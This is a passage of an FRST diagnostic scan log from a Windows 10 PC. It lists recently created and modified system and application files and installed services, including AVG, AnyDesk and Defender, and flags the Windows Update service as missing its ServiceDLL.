2020-08-12 19:44 - 2020-08-12 19:44 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\sti.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000312832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000307712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000273744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000247856 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000220984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBAUDIO.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000193592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\net1.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000179512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000165176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000152416 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdrsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000133256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000132408 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000127064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdshext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000124512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000104248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000090936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiarpc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cellulardatacapabilityhandler.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acwow64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuthKeyDelegate_From_20190529_To_20200303.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuth1KeyDelegate.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-08-12 19:35 - 2020-07-18 05:07 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-08-12 19:35 - 2020-07-18 04:53 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 14:24 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-11 14:23 - 2020-03-20 23:49 - 000000000 ____D C:\Users\Milan\AppData\LocalLow\Mozilla
2020-09-11 07:15 - 2020-04-05 22:19 - 000006107 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-09-11 06:46 - 2020-03-21 10:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2020-09-10 20:41 - 2020-04-04 23:09 - 000006115 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-09-10 17:45 - 2020-03-20 23:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-09-10 16:40 - 2020-06-07 10:48 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-09-10 16:40 - 2020-06-07 10:48 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-09-10 08:02 - 2020-04-04 00:12 - 000006119 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-09-10 07:43 - 2020-05-31 14:59 - 000002178 _____ C:\Users\Milan\Desktop\JDownloader 2.lnk
2020-09-10 07:43 - 2020-03-28 17:28 - 000000958 _____ C:\Users\Milan\Desktop\Mockba to Berlin.lnk
2020-09-10 07:43 - 2020-03-21 14:38 - 000001080 _____ C:\Users\Milan\Desktop\SpeedFan.lnk
2020-09-09 20:32 - 2020-04-05 15:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\vlc
2020-09-09 20:32 - 2020-04-03 11:51 - 000006111 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-09-09 08:42 - 2020-04-03 00:55 - 000006106 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-09-09 07:58 - 2020-07-17 10:20 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka
2020-09-08 19:55 - 2020-03-27 09:09 - 000006118 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-09-08 16:01 - 2020-03-30 11:51 - 000004612 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-09-08 16:01 - 2019-03-19 06:56 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-08 16:01 - 2019-03-19 06:56 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-09-08 08:24 - 2020-03-26 21:15 - 000006110 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-09-07 20:23 - 2020-03-26 08:49 - 000006102 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-09-07 07:56 - 2020-03-21 12:54 - 000006102 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-09-06 16:33 - 2020-03-21 12:43 - 000006098 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-09-04 20:52 - 2020-03-21 10:01 - 000006118 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-09-04 20:28 - 2020-08-08 11:31 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (2)
2020-09-03 20:48 - 2020-03-20 23:40 - 000006106 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-09-02 20:13 - 2020-03-21 00:32 - 000006611 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-09-02 20:09 - 2020-03-20 23:29 - 001694640 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-02 20:09 - 2019-03-19 13:55 - 000717182 _____ C:\WINDOWS\system32\perfh005.dat
2020-09-02 20:09 - 2019-03-19 13:55 - 000145262 _____ C:\WINDOWS\system32\perfc005.dat
2020-09-02 20:09 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-09-02 20:05 - 2020-03-20 23:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-09-02 20:04 - 2020-03-20 23:49 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-09-02 20:04 - 2020-03-20 23:40 - 000089749 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-09-02 20:04 - 2020-03-20 23:40 - 000017061 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-09-02 20:04 - 2019-03-19 06:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-09-02 20:01 - 2020-03-20 23:49 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-08-29 22:38 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-08-29 22:34 - 2020-03-20 23:30 - 000000000 ____D C:\Users\Milan
2020-08-29 18:15 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-29 18:14 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-08-29 17:33 - 2020-04-14 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Castlevania - The New Generation
2020-08-28 10:06 - 2020-06-07 10:48 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-28 10:06 - 2020-06-07 10:48 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-27 23:32 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-08-26 11:40 - 2020-03-20 23:34 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1738925715-1269715944-3180472622-1001
2020-08-26 11:40 - 2020-03-20 23:34 - 000000000 ___RD C:\Users\Milan\OneDrive
2020-08-26 11:40 - 2020-03-20 23:30 - 000002365 _____ C:\Users\Milan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-26 00:51 - 2020-04-11 00:56 - 000005712 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-08-25 12:48 - 2020-04-09 21:49 - 000006093 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-08-25 01:07 - 2020-04-08 22:17 - 000006094 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-08-24 12:54 - 2020-04-07 21:57 - 000006093 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-08-23 21:46 - 2020-04-06 21:57 - 000006615 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-08-15 14:23 - 2020-08-08 20:33 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (3)
2020-08-15 08:06 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 ___RD C:\Users\Milan\3D Objects
2020-08-12 21:39 - 2020-03-20 23:18 - 000353328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-08-12 21:37 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\servicing

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================
==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3668944 2020-08-08] (philandro Software GmbH -> philandro Software GmbH)
S2 avg; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [354272 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [7823296 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgm; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
S3 AVGSecureBrowserElevationService; C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\elevation_service.exe [1343656 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe [6986096 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2019-09-19] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\NisSrv.exe [2169568 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\MsMpEng.exe [128376 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
